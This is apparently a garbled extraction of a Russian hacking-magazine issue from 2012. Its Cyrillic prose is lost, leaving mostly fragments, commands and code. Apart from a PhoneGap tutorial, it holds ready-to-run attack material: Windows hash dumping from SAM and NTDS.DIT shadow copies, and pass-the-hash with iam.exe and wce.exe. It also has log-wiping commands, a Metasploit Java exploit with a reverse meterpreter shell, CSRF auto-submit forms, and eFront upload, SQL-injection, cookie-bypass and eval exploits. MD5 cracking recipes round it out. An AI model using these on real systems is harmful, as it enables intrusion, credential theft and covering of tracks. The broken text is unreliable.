maximumAge: 300000
});
}, 3000);
}
movePerson
getPointsInBounds() ,
- .
? HTML5
localStorage, (
,
). , , , !
-
,
.
- Safari Chrome.
,
.
, , ,
WebKit.
- -
01 /156/ 2012
PhoneGap: HTML5
. , , Run
iPhone/iPad
PhoneGap.
, index.html , . ,
,
www. , Create folder
references for any added folders.
, . www.
PhoneGap.
phonegap-1.2.0.js . PhoneGap . . Supporting Files/PhoneGap.
plist, ExternalHosts ,
( Google
Maps): *.gstatic.com, *.googleapis.com, maps.google.com.
,
. - DOMReady jQuery:
$(document).ready(). PhoneGap deviceready,
, . :
iOS
. - ( Denwer
XAMPP), ,
.
, . ,
, PhoneGap, ,
, . ,
iOS-. ,
PhoneGap IDE
.
iOS,
Mac OS 10.6+ (
Mac OS 10.6), Xcode
iOS SDK. SDK,
Apple , Xcode iOS SDK (developer.
apple.com/devcenter/ios/index.action). ,
4 . ,
Apple (
AppStore,
). iOS Objective-C. PhoneGap, PhoneGap iOS.
(https://github.com/callback/phonegap/zipball/1.2.0),
iOS . , Xcode PhoneGap.
,
IDE -
01 /156/ 2012
document.addEventListener("deviceready", function () {
new Notificator($("#map-canvas")[0]);
// ,
//
if (navigator.network.connection.type ===
Connection.NONE) {
navigator.notification.alert(" -",
$.noop, TITLE);
}
}, false);
, -. , . navigator.notification.alert
alert, , .
, network.
connection (bit.ly/uEyRwz) (bit.ly/tkvzE2).
:
document.addEventListener("touchmove", function (event) {
event.preventDefault();
}, false);
alert confirm ,
PhoneGap:
navigator.notification.confirm(' ?',
function (button_id) {
UI-
jQuery Mobile , ,
. PhoneGap
,
(phonegap.com/tools): Sencha Touch, Impact, Dojo Mobile, Zepto.js .
039
PC ZONE
if (button_id === 1) { // OK
self.removePoint(point);
}
}, TITLE);
, , , .
, ( ,
) ,
PhoneGap:
navigator.geolocation.watchPosition(function (position) {
self.movePerson(new gm.LatLng(
position.coords.latitude,
position.coords.longitude));
}, function (error) {
navigator.notification.alert(
'code: ' + error.code + '\nmessage: ' + error.message,
$.noop,
TITLE
);
}, {
frequency: 3000
});
, . Run ,
iOS-!
.
iPhone, iPod iPad , Xcode. .
:). :
PhoneGap, ,
. .
Appcelerator Titanium (www.appcelerator.com).
Titanium
Android iPhone, BlackBerry.
,
IDE. Titanium ,
( $49 ).
$120 . Appcelerator Titanium
, 25
.
Apache 2.
Corona SDK (www.anscamobile.com/corona).
iOS Android. . ,
OpenGL. , -
: $199 $349
iOS Android. Corona IDE .
Corona , JavaScript.
040
PhoneGap-
-
iOS
PhoneGap. Objective-C,
,
API PhoneGap. , Android Windows
Mobile 7, , -
, (
: phonegap.
com/start). ,
PhoneGap,
(phonegap.com/apps). PhoneGap
.
, ,
.
, HTML+JS -
, . , PhoneGap
Nitobi
( GitHub: github.com/
phonegap). ,
Nitobi Adobe.
, ? z
01 /156/ 2012
>> coding
PC ZONE
Ant (a.zhukov@real.xakep.ru)
WINDOWS-
WINDOWS-
, ,
,
,
NTLM.
.
.
?
, .
:
SAM-, LM/NTLM-
;
LSA, LM/NTLM- , ;
, MSCache-
, ( , ,
).
, AD-.
:
! , ,
. 7
.
PWDUMP
FGDUMP
,
. NTLM/LM-
.
, DLL-
SeDebugPrivilege. ,
( NT AUTHORITY\SYSTEM).
, :
,
( LiveCD), , Kon-Boot (www.piotrbania.com/all/kon-boot),
. ( NT AUTHORITY\
SYSTEM ),
EasyHack .
.
pwdump (www.foofus.net/~fizzgig/pwdump) fgdump (www.
foofus.net/~fizzgig/fgdump).
, . :
pwdump localhost
fgdump.exe
. 127.0.0.1.PWDUMP
( ) 127.0.0.1.CACHEDUMP
( ).
042
01 /156/ 2012
Windows-
,
, . , , pwdump, :
> pwdump -o mytarget.log -u MYDOMAIN\someuser -p \
'lamepassword' 10.1.1.1
10.1.1.1 , MYDOMAIN\
someuser , lamepassword , mytarget.log .
pwdump, fgdump ,
:
pwdump
hostfile.txt , , -T
10 .
,
( ).
, fgdump.exe.
VOLUME SHADOW COPY SERVICE
pwdump fgdump , , ,
. , .
,
SAM, , . ,
, SYSTEM.
,
, - . - ,
, ,
. , ,
, . , ,
Volume Shadow Copy Service ( ).
Windows XP Server 2003.
, , System
State ntbackup
(Volume Shadow Copy for Shared Folders).
,
( , SAM SYSTEM),
.
, Windows
, , .
,
. ,
, . HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\cachedlogonscount 0.
, .
.
01 /156/ 2012
Windows
Credentials Editor (WCE)
, vssown.vbs
(tools.lanmaster53.com/vssown.vbs), .
.
: cscript vssown.vbs /start.
: cscript vssown.vbs /create.
: cscript vssown.vbs /list.
. Device object \\?\GLOBALROOT\
Device\HarddiskVolumeShadowCopy14 ( 14
). .
1. :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\
windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\
windows\system32\config\SAM .
2. , -
SAMInside (insidepro.com/rus/saminside.shtml)
.
, ,
,
! ,
. ,
SAM SYSTEM. Active Directory NTDS.DIT, :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\
windows\ntds\ntds.dit .
, SYSTEM. ,
? SYSTEM NTDS.DIT,
?
, , NTDS.DIT , .
Csaba Barta ,
NTDS.DIT .
csababarta.com/downloads/
043
PC ZONE
ntds_dump_hash.zip. , .
BackTrack5 ( Linux-),
. ,
. libesedb:
cd libesedb
chmod +x configure
./configure && make
SAMInside
:
.
, :
cd esedbtools
./esedbdumphash ../../ntds.dit
/libesedb/esedbtools/ntds.dit.export/datatable.
. , SYSTEM:
cd ../../creddump/
python ./dsdump.py ../SYSTEM
../libesedb/esedbtools/ntds.dit.export/datatable
! !
, ( ).
, : python ./dsdumphistory.py
../system ../libesedb/esedbtools/ntds.dit.export/datatable.
, ,
( ).
HASHGRAB2 +
SAMDUMP2
, .
, ,
LiveCD (,
Offline NT Password & Registry Editor),
,
. HashGrab2 (py1337.get-root.com/tools/hashgrab2.
zip) samsump2 (sourceforge.net/projects/ophcrack/files/
samdump2/2.0.1),
LiveCD-. HashGrab2
Windows-, , samdump2
SAM SYSTEM.
METASPLOIT
, .
Meterpreter.
Metasploit Framework
. :
meterpreter > run post/windows/gather/hashdump
.
. Metasploit ,
. PsExec:
meterpreter > use exploit/windows/smb/psexec
SAMInside
insidepro.com/rus/saminside.shtml
,
NTLM-.
.
, .
,
Windows
.
044
lm2ntcrack
ighashgpu
www.xmco.fr/lm2ntcrack/index.html
www.golubev.com/hashgpu.htm
,
. NT, LM- .
, LM- ,
NT
. ,
, LM- ADMINISTRAT0R,
, , ,
lm2ntcrack.
. , - , .
ighashgpu
GPU MD4, MD5, SHA1, NTLM,
Oracle 11g, MySQL5, MSSQL. ,
.
01 /156/ 2012
Windows-
meterpreter >
meterpreter >
meterpreter >
]
meterpreter >
meterpreter >
meterpreter >
meterpreter >
, , . ,
. ,
getsystem. , MS09-012, MS10-015 (KiTrap0D) .
PASS-THE-HASH
NTLM .
,
.
:). , Pass The Hash,
1997 .
Pass-the-Hash Toolkit. (oss.
coresecurity.com/projects/pshtoolkit.html): IAM.EXE, WHOSTHERE.EXE
GENHASH.EXE. , GENHASH
LM- NT- . WHOSTHERE.
EXE, -, .
, :
, / NTLM- . IAM.
EXE
- ,
(, , . .),
,
,
.
,
NTLM-,
, .
:
whosthere.exe
;
iam.exe -h administrator:mydomain:AAD3B435B51404EEAAD3B
435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.
, , ,
.
CUDA-Multiforcer
Cain&Abel NTML
( )
WINDOWS
CREDENTIALS EDITOR
. ,
- - :
wce.exe -s <username>:<domain>:<lmhash>:<nthash> \
-c <program>.
:
wce.exe s user:Victim:1F27ACDE849935B0AAD3B435B51404EE
:579110C49145015C47ECD267657D3174 -c "c:\Program Files\
Internet Explorer\iexplore.exe"
, , . .
, (, )
, . z
ophcrack
ophcrack.sourceforge.net
www.cryptohaze.com/multiforcer.php
, .
,
nVidia. : MD5, NTLM, MD4, SHA1,
MSSQL, SHA, MD5_PS: md5($pass.$salt), MD5_SP:
md5($salt.$pass), SSHA: base64(sha1($pass.$salt)),
DOUBLEMD5: md5(md5($pass)), TRIPLEMD5, LM:
Microsoft LanMan hash .
Windows
rainbow-.
.
, , .
rainbow-. ,
,
.
NTLM-,
-. jumbo,
, NTLM.
diff',
, ( win32).
01 /156/ 2012
www.openwall.com
045
PC ZONE
WINDOWS-?
. , , Windows-,
? . ,
? -,
.
. , ,
( nmap, - ),
.
ipconfig /all
ipconfig /displaydns
DNS-.
netstat -nabo
TCP/UDP-. -b ,
, .
netstat -s -p [tcp|udp|icpm|ip]
netstat r
route print
.
.
, , 445.
net view
SMB ().
( '/domain',
). , ,
, . .
net accounts
( ).
, NetBIOS, , , , . .
net share
SMB-.
arp -a
ARP- .
type %WINDIR%\System32\drivers\etc\
hosts
hosts.
046
01 /156/ 2012
.
: ( ), ,
, , . .
whoami
? .
'/all' SID , SID , (
?).
whoami /all
qwinsta
, , - . RDP- (
), .
ver
( uname ), , .
set
. SET ,
. USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .
systeminfo (XP+)
, , ,
, , .
qprocess *
, .
, ID , PID .
qappsrv
, .
csv, .
at
, , ,
. , SYSTEM ( Win7x64). , , BAT- do_something.bat
SYSTEM 15:41, :
at 15:41 /interactive "d:\pentest\do_something.bat"
, .
schtasks (XP+)
, . at,
schtasks ( ).
sc getkeyname "XXXXX"
sc queryex "XXXXX"
key name .
, PID .
tasklist (XP+)
PID
( ).
gpresult /z
- .
. , . ,
.
wevtutil el
, (, . .).
wevtutil qe <LogName>
wevtutil cl <LogName>
del %WINDIR%\*.log /a /s /q /f
WINDOWS.
01 /156/ 2012
047
PC ZONE
Windows - . -
- .
%windir%\System32\cmd.exe /c
"%SystemRoot%\system32\Dism.
exe" /online /get-features
, ,
Windows Vista SP1/7/2008/2008R2, , telnet ftp-..
%windir%\System32\cmd.exe /c
"%SystemRoot%\system32\Dism.
exe" /online /enable-feature /
featurename:TFTP
net use
,
. :
, , , (, ).
security . , , system.
SAM, .
( TargetIPaddr).
, REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead (: Data,
: REG_BINARY, : fe340ead).
, , .
, , C: sam_backup.dat?
, , , .
:
C: , .
048
01 /156/ 2012
WMIC
, ,
WMI (Windows Management Interface).
, WMI- (WMIC): , , .
WMI
. , WMI- (computersystem, bios, ,
, baseboard) .
. .
: , MAC-, IP-,
.
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
, .
wmic path win32_product where "name = 'HP Software Update'" call Uninstal
HP Software Update.
, .
.
hacker .
hacker .
C: hacker .
- ( , ),
.
Windows.
,
(, ).
() .
01 /156/ 2012
049
/ EASY HACK
EASY
HACK
MITM RDP
-
. ,
. , ,
,
. ?
RDP,
.
.
:
,
Windows, XP 2000 ( ). ,
,
TLS. , , . 6- man-in-the-middle (MiTM),
,
, . , XP
,
. ,
RDP.
MiTM , , , , , , :).
MiTM RDP 6- :
0) ARP- DNS-. , .
1) .
2)
salt'. .
3) , .
4)
.
050
5) (
RC4).
, MiTM-. ,
. , MD5- ,
(. . ), .
,
.
, .
(goo.
gl/7yADy). RDP MiTM, . - Cain&Abel (www.oxid.it):
Sniffer Scan MAC address.
ARP ARP .
.
: ,
, .
5) arp-poisoning.
1)
2)
3)
4)
01 /156/ 2012
EASY HACK
JAVA
, Java, , . , Java
, Flash, ,
. ?
, Java , . javatester.org/
version.html .
,
. ? ,
-
CVE-2010-4452, . , Metasploit':
,
Java-.
, , ,
. ? ! :)
JavaScript,
Java-,
. , ,
(defcon-russia.ru/wall.txt).
SET (Social Engineer Toolkit).
BackTrack 5
(www.social-engineer.org). SET
, .
SET :
1) :
use exploit/windows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 80
3) :
Set payload java/meterpreter/reverse_tcp
4) :
Exploit
exe-. ,
, Java.
, ? ?
? ? :) ,
, , , . ,
( :)),
. , - ,
. :
SMTP (25/TCP)
, Gmail Mail.ru.
, , , , ,
, -
. ?
150 . ,
IP.
3proxy (www.3proxy.ru), ,
. 3APA3A. , security.nnov.ru
,
, ,
. :)
( *), (
)
:
- .
,
. - 3proxy. ,
?
( ).
, , -
( www.example.com:25). ,
. , nmap
.
, UDP ICMP, TCP, TCP-ACK. ,
.
proxy p25
01 /156/ 2012
051
/ EASY HACK
REVERSE-
, reverse. ? ,
-, () -
. ? . ,
reverse-
-, WAF
SSL-, , (,
). .
,
(,
- ?). .
reverse-
. ?
-. . , X-Forwarded-For,
, ! , HTTP
, .
(goo.gl/V0beW). HTTP,
RFC 2616 1.1, ,
Max Forwards. , , TRACE OPTIONS.
-
.
HTTP-traceroute. Squid
reverse- Wikipedia.org
,
, ,
. , GET POST,
. , TTL IP-.
,
- ,
HTTP- traceroute. , TRACE-
-,
RFC, GET
MaxForwards. traceroute,
, IP- .
:
HTTP-Traceroute.py -t www.victim.com
GET/POST)
- CSRF
052
reverse proxy
-m (TRACE/
. GET- . ,
POST?
:
<form name=passwd action=
"http://server.com/change_password.php" method="post">
<input type=hidden name= NP value= new_pass >
<input type="submit">
</form>
<script>document.passwd.submit();</script>
! XML? XML-. :)
<form name=passwd ENCTYPE="text/plain"
action="http://server.com/change_password.php"
METHOD="POST">
<input type=hidden name='<?xml version'
value='"1.0"?><User><Password>new_pass</Password></User>'>
</form>
<script>document.passwd.submit();</script>
, , . ;).
01 /156/ 2012
EASY HACK
(, , digital
forensics) ,
.
,
, .
, :
;
;
;
DLL- ;
;
;
;
Virtual Address Descriptor;
;
..
, , , ,
.
Volatility (goo.gl/
Hi5ip). Python'
Windows ( XP), , 32-. , ,
. ,
.
(
), ,
. ,
, MoonSols DumpIt (http://goo.gl/BY1QN).
- :
. . , ,
( ,
USB).
, ? Volatility.
, Python', standalone-, .
, :
volatility.exe imageinfo f d:\test.raw
:
imageinfo ;
f d:\test.raw .
Volatility - . ;)
(WinXPSP3x86),
. , ?
:
volatility pslist -f d:\test.raw --profile=WinXPSP3x86
, , :
volatility netscan -f d:\test.raw --profile=WinXPSP3x86
- , ,
, SAM, -
LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSP3x86
hivelist ,
.
,
:
volatility hashdump -f d:\test.raw --profile=WinXPSP3x86
-y 0xe1035b60 -s 0xe1805b60
:
hashdump ;
y 0xe1035b60 System;
s 0xe1805b60 SAM.
01 /156/ 2012
, . ,
. ,
, . Volatility.
,
, .
053
(ivinside.blogspot.com)
(115612, . , .1)
. ,
, ,
, ,
.
054
CVSSV2
9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
: 5 2011 .
: Aniway, abysssec, sinn3r, juan vazquez.
CVE: CVE-2011-0105.
,
xlb Excel.
.
EXPLOIT
Excel ,
(, ).
xlb.
01 /156/ 2012
ajax_save_name.php
BIFF8.
,
. BIFF-
:
BOF Type = workbook globals
Workbook globals
...
EOF
BOF Type = worksheet
Sheet records
EOF
BOF Type = worksheet
Sheet records
EOF
...
ID ( )
, sz ( )
(sz )
(ID ) . .
: BOF (Begin Of File) EOF (End Of File).
BOF, :
0809H
0010H
0600H
****H
BOF-:
0005H Workbook globals
01 /156/ 2012
BOF 0xA7.
,
0x3C.
sub_30199E55.
. .
, ,
,
.
BOF, BIFF8
.
2
2
00
2
02
2
04
2
06
2
08
4
12
4
0006H
0010H
0020H
0040H
0100H
ID
ID
Excel,
.text:3053F830
.text:3053F835
.text:3053F838
.text:3053F83E
.text:3053F844
.text:3053F849
.text:3053F84F
.text:3053F856
.text:3053F858
.text:3053F85E
.text:3053F862
.text:3053F867
.text:3053F869
.text:3053F86A
.text:3053F86C
.text:3053F86E
.text:3053F86F
.text:3053F870
.text:3053F872
call sub_301A0A01
cmp eax, 3Ch
mov [ebp+var_ED4], eax
jnz loc_30540488
call sub_301A0A01
mov ecx, [ebp+var_EDC]
imul ecx, [ebp+var_F00]
mov edi, eax
mov eax, [ebp+var_EE0]
lea ebx, [ecx+eax+3]
call sub_301A0ABE
push 0FFFFFFFDh
pop edx
sub edx, ecx
add eax, edx
push eax ; Dst
push ebx ; int
mov eax, edi
call sub_30199E55
, sub_30199E55 ,
. ,
.
055
CheckFile()
.text:30199E60
.text:30199E64
.text:30199E6A
.text:30199E6E
.text:30199E6F
.text:30199E75
.text:30199E76
.text:30199E7C
.text:30199E7D
...
.text:30199E93
.text:30199E97
.text:30199E98
.text:30199E9E
.text:30199E9F
.text:30199EA0
.text:30199EA2
.text:30199EA7
.text:30199EAB
.text:30199EAD
.text:30199EB0
.text:30199EB2
.text:30199EB8
PE-.
, .
, .
memcpy,
, /GS. ,
esp . ,
call esp.
TARGETS
, .
CVSSV2
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
,
. ,
/GS /SAFESEH. , /GS
MS Visual Studio, , .
,
,
.
cookie,
.
64-
, ,
cookie. , ,
. . /SAFESEH
SEH- .
,
,
. ,
. Visual Studio
/SAFESEH
056
: 23 2011 .
: KiDebug.
CVE: CVE-2011-1985.
win32k.sys , . .
EXPLOIT
:
.text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near
; CODE XREF: xxxDefWindowProc(x,x,x,x)+6E|p
.text:BF9140C0
; NtUserMessageCall(x,x,x,x,x,x,x)+61|p ...
.text:BF9140C0
.text:BF9140C0 HWND
= dword ptr 8
.text:BF9140C0 arg_4
= dword ptr 0Ch
.text:BF9140C0 arg_8
= dword ptr 10h
.text:BF9140C0 arg_C
= dword ptr 14h
.text:BF9140C0 arg_10
= dword ptr 18h
.text:BF9140C0 arg_14
= dword ptr 1Ch
.text:BF9140C0 arg_18
= dword ptr 20h
01 /156/ 2012
,
BSoD:
.text:BF9140C0
.text:BF9140C0
mov
edi, edi
.text:BF9140C2
push
ebp
.text:BF9140C3
mov
ebp, esp
.text:BF9140C5
mov ecx, [ebp+HWND]
; HWND == 0xffffffff (-1),
.text:BF9140C8
mov eax, [ecx+20h] ; BSOD
...
NtUserMessageCall NtUserfnINCBOXSTRING
, CB_ADDSTRING:
.text:BF80EE6B ; int __stdcall NtUserMessageCall(int,
int, int UnicodeString, PVOID Address, int, int, int)
...
.text:BF80EEB1
push
[ebp+arg_18]
; int
.text:BF80EEB4
movzx
eax, ds:_MessageTable[eax]
.text:BF80EEBB
push
ecx
; int
.text:BF80EEBC
push
[ebp+arg_10]
; int
.text:BF80EEBF
and
eax, 3Fh
.text:BF80EEC2
push
[ebp+Address]
; Address
.text:BF80EEC5
push
[ebp+UnicodeString] ; int
.text:BF80EEC8
push
[ebp+arg_4]
; int
.text:BF80EECB
push
esi
; int
.text:BF80EECC
call
ds:_gapfnMessageCall[eax*4]
; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)
...
.rdata:BF990D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28
.rdata:BF990D68
; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)
.rdata:BF990D68
; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D6C
dd offset _NtUserfnNCDESTROY@28
; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D70
dd offset _NtUserfnINLPCREATESTRUCT@28
; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)
...
.rdata:BF990DD4
dd offset _NtUserfnINCBOXSTRING@28
; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
...
,
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
01 /156/ 2012
CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING
CB_SELECTSTRING
CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER
0x0143
0x014A
0x014C
0x014D
0x0158
0x0180
0x0181
0x018C
0x018F
0x01A2
0x01AA
0x01AB
0x01AC
0x01AD
TARGETS
MS11-077, .
Wordpress
Zingiri Web Shop Plugin
CVSSV2
7.5
(:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
WordPress
. , ,
.
-,
,
.
Egidio Romano aka EgiX . EgiX
13 , ,
.
EXPLOIT
/fws/addons/
tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_
name.php, 3756
.
$selectedDocuments POST- value.
$selectedDocuments
displayArray() writeInfo(), , $selectedDocuments. writeInfo(), /fws/addons/
tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_
folder.php:
function writeInfo($data, $die = false)
{
$fp = @fopen(dirname(__FILE__) .
DIRECTORY_SEPARATOR . 'data.php', 'w+');
@fwrite($fp, $data);
057
if ($_POST['templateName']) {
$dir = '../../../../content/editor_templates/'.
$_SESSION['s_login'];
if (!is_dir($dir) && !mkdir($dir, 0755)) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
}
$filename = $dir.'/'.$_POST['templateName'].'.html';
$templateContent = $_POST['templateContent'];
if(file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 0644);
GetUserTimeTarget()
! data.php,
-.
exploit-db.com (EDB-ID: 18111). PHP,
PHP.
,
, :
// Arch Linux
# pacman -S php
// Debian-based
# apt-get install php
:
$ php 18111.php <host> <path>
SOLUTION
2.2.4 .
2. . checkFile(), /libraries/filesystem.
class.php, 31433154
. FileSystemTree::uploadFile(),
, checkFile() . , ,
file_black_list,
php, php3, jsp, asp, cgi, pl, exe, com,
bat.
php.
eFront
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
EgiX
eFront.
,
, .
EXPLOIT
1. .
/www/editor/tiny_mce/plugins/save_template/save_template.php
( 818):
058
POST /efront/www/editor/tiny_mce/plugins/
save_template/save_template.php HTTP/1.1
Host: localhost
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
templateName=sh.php%00&templateContent=
<?php evil_code(); ?>
3. SQL- UPDATE.
getUserTimeTarget(), /libraries/
tools.php: .
, package_ID,
$entity. , /www/
periodic_updater.php:
TARGETS
, file_put_
contents() $_POST['templateName'] $_
POST['templateContent'], . ,
, ,
php,
magic_quotes_gpc. ,
, :
if ($_SESSION['s_login']) {
$entity = getUserTimeTarget($_GET['HTTP_REFERER']);
//$entity = $_SESSION['s_time_target'];
//Update times for this entity
$result = eF_executeNew("update user_times set time=time+("
.time().
"-timestamp_now),timestamp_now="
.time().
"where session_expired = 0 and session_custom_identifier = '".
$_SESSION['s_custom_identifier'].
"' and users_LOGIN = '".
$_SESSION['s_login'].
"' and entity = '".
current($entity).
"'and entity_id = '".
key($entity).
"'");
01 /156/ 2012
, $_GET['HTTP_REFERER'], getUserTimeTarget(),
eF_executeNew(). ,
SQL- URL
:
http://localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]
$_SERVER['HTTP_REFERER'], , -,
.
.
4. .
/www/index.php:
if (isset($_COOKIE['cookie_login'])
&& isset($_COOKIE['cookie_password']))
{
try {
$user = EfrontUserFactory :: factory(
$_COOKIE['cookie_login']);
$user -> login($_COOKIE['cookie_password'], true);
$_COOKIE['cookie_login'],
EfrontUserFactory::factory(),
,
:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_
login=administrator;cookie_login=1;cookie_password=1
Connection: keep-alive
5. PHP-. /www/student.php:
if (isset($_GET['course']) ||
isset($_GET['from_course']))
{
if ($_GET['course'])
{
$course = new EfrontCourse($_GET['course']);
} else {
$course = new EfrontCourse($_GET['from_course']);
}
$eligibility = $course -> checkRules(
$_SESSION['s_login']);
, $_GET['course'] $_GET['from_
course'],
EfrontCourse, ,
eval():
/student.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a:1:{s:19:"1];
phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}
TARGETS
01 /156/ 2012
059
MD5
(blog.chivavas.org)
INFO
WWW
ATI
Radeon HD 4850
X2
2,2
!
bit.ly/vEhdir
RainbowCrack
API.
MD5
.
bit.ly/vTSB9K
DVD
MD5.
, . -,
,
,
. , , MD5.
.
: , . ,
.
. - ( )
, . .
MD5.
MD5 1 2004 .
CertainKey Cryptosystems MD5CRK . -. 24 2004
, ,
060
01 /156/ 2012
MD5
, - . , 31 2008 NIST
. SHA1 SHA2.
BLAKE, Gostl, JH,
Keccak Skein. .
I GHASHGPU: GPU
MD5-
. . ,
- : d8578edf8458ce06fbc5bb76a
58c5ca4. Ighashgpu, www.golubev.com
.
.
, Ighashgpu GPU,
nVidia ATI c CUDA/
ATI Stream.
, CPU,
.
GPU ,
. , :
Windows:
ighashgpu.exe -t:md5 \
-h:d8578edf8458ce06fbc5bb76a58c5ca4 -max:7
MD5
, ,
.
IBM p690 (,
). :-) 2005
.
X.509 , .
, . 2006
. 2006 , !
. 2008
Chaos Communication Congress
X.509. MD5.
. 2007 , Sony PlayStation3 MD5. : 1,4 MD5- ! , 2009-, BlackHat
USA GPU ,
,
.
?
2011 IETF RFC 1321 (MD5)
RFC 2104 (HMAC-MD5). RFC 6151.
MD5
. ,
MD5. , MD5
, ,
,
01 /156/ 2012
, MD5.
.
- (qwerty).
, . d11fd4559815b2c3de1b685bb7
8a6283, , ,
_admin.
, :
ighashgpu.exe -h:d11fd4559815b2c3de1b685bb78a6283 -t:md5
-u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????_admin
'-u' , , '-m' .
,
_admin.
.
, -
.
,
. ,
. ,
,
. ,
, .
- , .
,
.
061
8- , 126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. , , .
MD5
encrypted.dat
IGHASHGPU:
. ,
. , c00l:
f0b46ac8494b7761adb7203aa7776c2a
f2da202a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89a04a9d94dacf
cb1cb9a40708a151e6c92702342f0ac5
00a931d3facaad384169ebc31d38775c
4966d8547cce099ae6f666f09f68458e
encrypted.dat Ighashgpu
:
ighashgpu.exe -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_]
-m:??????c00l encrypted.dat
Ighashgpu ighashgpu_results.txt :
f0b46ac8494b7761adb7203aa7776c2a:1rootxc00l
f2da202a5a215b66995de1f9327dbaa6:pwd12xc00l
c7f7a34bbe8f385faa89a04a9d94dacf:pwd34yc00l
cb1cb9a40708a151e6c92702342f0ac5:pwd56yc00l
4966d8547cce099ae6f666f09f68458e:pwd98zc00l
00a931d3facaad384169ebc31d38775c:pwd78zc00l
IGHASHGPU:
,
.
. 80- ,
, 640 10 ,
. ,
.
2003 , , ,
, -.
- .
.
, ,
- ( ,
64 ).
, .
. ,
. ,
. ,
. .
,
. ,
.
.
, .
.
. , :
.
RainbowCrack (project-rainbowcrack.com), Windows,
: 42151cf2ff27c5181bb36a8b
cfafea7b.
Ighashgpu -asalt:
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] \
-asalt:s41t
062
RAINBOW TABLES
,
8599%.
01 /156/ 2012
MD5
Linux. : LN/
NTLM, MD5 SHA1. ,
- . MD5.
: , ,
. Free Rainbow
Tables (freerainbowtables.com). ,
, , .
3 MD5, SHA1, LM NTLM.
,
. : LN/NTLM, MD5
SHA1 200 .
.
rtgen, RainbowCrack. :
hash_algorithm (LM, NTLM, MD5
SHA1);
charset ,
charset.txt;
plaintext_len_min plaintext_len_max ;
table_index, chain_len, chain_num part_index
, (bit.ly/nndT8M).
:
1. table_index ,
. 0, .
2. chain_len .
3. chain_num .
4. part_index , .
( 0).
MD5:
rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0
,
. Eee PC Intel Atom N450
:). md5_
loweralpha-numeric#1-7_0_2000x97505489_0.rt 1,5 .
,
.
rtsort.exe:
rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt
!
. :
d8578edf8458ce06fbc5bb76a58c5ca4. rcrack_gui.exe
Add Hash... File.
OK. .
Search Rainbow Tables... Rainbow Table.
,
md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt,
Open. !
.
01 /156/ 2012
.
.
MDCrack, CPU (
).
GPU (nVidia GeForce GT 220M), CPU (Intel Atom N450,
) :
4
5
6
7
|
|
|
|
|
GPU
00:00:01
00:00:02
00:00:16
00:07:11
|
|
|
|
|
CPU
00:00:01
00:00:09
00:05:21
09:27:52
|
|
|
|
|
00:00:16
00:00:16
00:00:10
00:00:04
, CPU , GPU .
,
,
. ,
, 4- 5- ,
.
,
. , .
.
-, ,
MD5 SHA1. - SHA2 SHA3
( ). -,
.
.
-,
. ,
100 %, . z
063
-
SPYEYE
.
.
,
.
, , . ,
,
SpyEye. -. ,
gribodemon Zeus, .
][ ,
SpyEye.
.
SpyEye
&C- ( SpyEye
Tracker)
,
.
.
064
01 /156/ 2012
WWW
bit.ly/tBYWgi
Google ;
SpyEyetracker.abuse.ch
SpyEye Tracker;
pastebin.com/
T0pUiEJp
;
bit.ly/sXe4PC
SpyEye ;
exploit-db.com
.
WARNING
.
,
,
.
SPYEYE
, SpyEye. . - (form grabbing),
webinjects (webinjects.txt)
( ) ,
. .
,
( , plugins).
DDoS,
RDP, SOCKS-, . .
( #10/2011
][).
